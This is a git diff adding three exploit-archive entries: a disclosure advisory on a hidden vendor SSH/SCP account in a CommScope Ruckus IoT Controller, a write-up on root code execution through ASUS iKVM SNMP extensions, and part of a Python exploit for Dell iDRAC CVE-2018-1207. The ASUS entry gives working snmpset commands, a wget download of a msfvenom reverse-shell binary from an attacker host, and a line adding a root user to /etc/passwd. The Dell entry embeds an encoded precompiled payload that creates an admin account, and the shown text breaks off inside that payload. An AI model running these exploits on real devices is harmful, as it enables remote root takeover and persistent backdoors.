diff --git a/exploits/hardware/local/52242.txt b/exploits/hardware/local/52242.txt
new file mode 100644
index 000000000..734b3cb99
--- /dev/null
+++ b/exploits/hardware/local/52242.txt
@@ -0,0 +1,110 @@
+# Exploit Title: CommScope Ruckus IoT Controller 1.7.1.0 - Undocumented Account
+# Date: 2021.05.26
+# Exploit Author: korelogic
+# Vendor Homepage: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
+# Affected Product: Ruckus IoT Controller
+# Version: 1.7.1.0 and earlier
+# Tested on: Linux
+# CVE : CVE-2021-33216,CVE-2019-1000018
+
+
+KL-001-2021-007: CommScope Ruckus IoT Controller Undocumented Account
+Advisory ID: KL-001-2021-007
+Publication Date: 2021.05.26
+Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2021-007.txt
+1. Vulnerability Details
+Affected Vendor: CommScope
+Affected Product: Ruckus IoT Controller
+Affected Version: 1.7.1.0 and earlier
+Platform: Linux
+CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-912: Hidden Functionality
+CVE ID: CVE-2021-33216
+2. Vulnerability Description
+An upgrade account is included in the IoT Controller OVA that
+provides the vendor undocumented access via Secure Copy (SCP).
+3. Technical Description
+Once the OVA is imported into VirtualBox, a VMDK file is
+created. The VMDK file can be mounted and the directory
+structure and its contents can be perused.
+An authorized_keys file exists that allows an
+individual/organization possessing the SSH private key to
+access the virtual appliance using the 'vriotiotupgrade'
+account. The 'vriotiotupgrade' account is restricted to scp,
+per the rssh configuration.
+Additionally, it appears that the IoT Controller has rssh version 2.3.4
+installed and in use. At the time of this advisory, there are at least
+three remote command injection vulnerabilities in this particular version
+of rssh: CVE-2019-3463, CVE-2019-3464 and CVE-2019-1000018.
+4. Mitigation and Remediation Recommendation
+The vendor has released an updated firmware (1.8.0.0) which
+remediates the described vulnerability. Firmware and release
+notes are available at:
+https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
+5. Credit
+This vulnerability was discovered by Jim Becher (@jimbecher)
+of KoreLogic, Inc.
+6. Disclosure Timeline
+2021.03.30 - KoreLogic submits vulnerability details to
+CommScope.
+2021.03.30 - CommScope acknowledges receipt and the intention
+to investigate.
+2021.04.06 - CommScope notifies KoreLogic that this issue,
+along with several others reported by KoreLogic,
+will require more than the standard 45 business
+day remediation timeline.
+2021.04.06 - KoreLogic agrees to extend disclosure embargo if
+necessary.
+2021.04.30 - CommScope informs KoreLogic that remediation for
+this vulnerability will be available inside of the
+standard 45 business day timeline. Requests
+KoreLogic acquire CVE number for this
+vulnerability.
+2021.05.14 - 30 business days have elapsed since the
+vulnerability was reported to CommScope.
+2021.05.17 - CommScope notifies KoreLogic that the patched
+version of the firmware will be available the week
+of 2021.05.24.
+2021.05.19 - KoreLogic requests CVE from MITRE.
+2021.05.19 - MITRE issues CVE-2021-33216.
+2021.05.25 - CommScope releases firmware 1.8.0.0 and associated
+advisory.
+2021.05.26 - KoreLogic public disclosure.
+7. Proof of Concept
+With the VMDK file mounted at the current working directory:
+$ find . -name authorized_keys
+./VRIOT/ap-images/authorized_keys
+./VRIOT/ops/ap-images/authorized_keys
+$ cat VRIOT/ap-images/authorized_keys
+ssh-rsa
+AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
+chandini.venkatesh@commscope.com
+$ cat VRIOT/ops/ap-images/authorized_keys
+ssh-rsa
+AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
+chandini.venkatesh@commscope.com
+$ grep "ap-images" etc/passwd
+vriotiotupgrade:x:1002:1002::/VRIOT/ap-images/:/usr/bin/rssh
+$ tail -8 etc/ssh/sshd_config
+Match User vriotiotupgrade
+PasswordAuthentication no
+AuthorizedKeysFile /VRIOT/ap-images/authorized_keys
+Match User vriotha
+PasswordAuthentication yes
+$ grep -v ^# etc/rssh.conf
+logfacility = LOG_USER
+allowscp
+umask = 022
+The contents of this advisory are copyright(c) 2021
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+Our public vulnerability disclosure policy is available at:
+https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
\ No newline at end of file
diff --git a/exploits/hardware/local/52244.txt b/exploits/hardware/local/52244.txt
new file mode 100644
index 000000000..c44b6cdd0
--- /dev/null
+++ b/exploits/hardware/local/52244.txt
@@ -0,0 +1,61 @@
+# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)
+# Date: 2023-02-16
+# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023], SC
+# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
+# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
+# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
+# CVE: CVE-2023-26602
+
+++++++++++++++++++++
+0x00 DESCRIPTION
+++++++++++++++++++++
+During a recent engagement, a remote server management interface has been
+discovered. Furthermore, SNMPv2 was found to be enabled, offering write
+access to the private community, subsequently allowing us to introduce
+SNMP arbitrary extensions to achieve RCE.
+We also found a hardcoded account sysadmin:superuser by cracking the
+shadow file (md5crypt) found on the system and identifed an "anonymous"
+user w/ the same password, however a lock seems to be in place to prevent
+using these credentials via SSH (running defshell as default shell).
++++++++++++++++
+0x01 IMPACT
++++++++++++++++
+By exploiting SNMP arbitrary extension, we are able to run any command on
+the system w/ root privileges, and we are able to introduce our own user
+circumventing the defshell restriction for SSH.
++++++++++++++++++++++++++++++++
+0x02 PROOF OF CONCEPT (PoC)
++++++++++++++++++++++++++++++++
+At first, we have to create required extensions on the system, e.g. via
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
+and if everything is set, we can just run that command by
+snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
+which will execute our defined command and show us its output.
++++++++++++++++++++++++++++++++
+0x03 SSH Remote Root Access
++++++++++++++++++++++++++++++++
+The identified RCE can be used to transfer a reverse tcp shell created
+by msfvenom for arm little-endian, e.g.
+msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
+We can now transfer the binary, adjust permissions and finally run it:
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
+Again, we have to request execution of the lines in the MIB via:
+snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
+We get a reverse connection from the host, and can now act on the local system
+to easily echo our own line into /etc/passwd:
+echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
+By setting the standard shell to /bin/sh, we are able to get a SSH root
+shell into the system, effectively circumventing the defshell restriction.
+$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
+BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
+Enter 'help' for a list of built-in commands.
+# uname -a
+Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
+# uptime
+15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
+# head -n 1 /etc/shadow
+sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
+---
+#EOF
\ No newline at end of file
diff --git a/exploits/hardware/remote/52246.py b/exploits/hardware/remote/52246.py
new file mode 100755
index 000000000..42e308b52
--- /dev/null
+++ b/exploits/hardware/remote/52246.py
@@ -0,0 +1,171 @@
+# Exploit Title: Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)
+ via file upload
+# Date: 2024-08-28
+# Exploit Author: Photubias
+# Vendor Homepage: https://dell.com
+# Vendor Advisory: [1] https://dl.dell.com/manuals/all-products/esuprt_solutions_int/esuprt_solutions_int_solutions_resources/dell-management-solution-resources_White-Papers6_en-us.pdf
+# Version: integrated Dell Remote Access Console v7 & v8 < 2.52.52.52
+# Tested on: iDRAC 7 & 8
+# CVE: CVE-2018-1207
+
+r'''
+ Copyright 2024 Photubias(c)
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see .
+
+ File name CVE-2018-1207.py
+ written by Photubias
+
+ CVE-2018-1207 is an unauthenticated file upload and
+ so library execution vulnerability on the HTTPS web interface.
+ This exploit contains a checker and a builtin exploit to add a webuser for remote admin access
+
+ # Manual verification example, if libraries are returned, the target is vulnerable:
+ # curl -ik "http://192.168.1.100//cgi-bin/login?LD_DEBUG=files"
+
+ Feel free to scan your network via the iDRAC fingerprinter to find vulnerable systems:
+ https://github.com/tijldeneut/Security/blob/master/iDRAC-fingerprinter.py
+
+ This is a native implementation, written in Python 3 and only requires requests (pip3 install requests)
+ Works equally well on Windows as Linux (as MacOS, probably ;-)
+
+ Features: vulnerability checker + exploit
+
+ WARNING: The built-in payload is precompiled and does this:
+ - Configure USER ID 13 with username 'user', password 'Passw0rd' and as an iDRAC webadmin
+ - Any user that might be at ID 13 will be overridden and is unrecoverable
+ - TIP1: use racadm for command line access after exploitation (also uses TCP/443)
+ - TIP2: use racadm to retrieve user hash with command: racadm -r -u user -p Passw0rd get iDRAC.Users.2
+'''
+
+import requests, optparse, base64, struct, time
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+requests.warnings.filterwarnings('ignore', category=DeprecationWarning)
+
+iTimeout = 10
+
+sPayloadCode ='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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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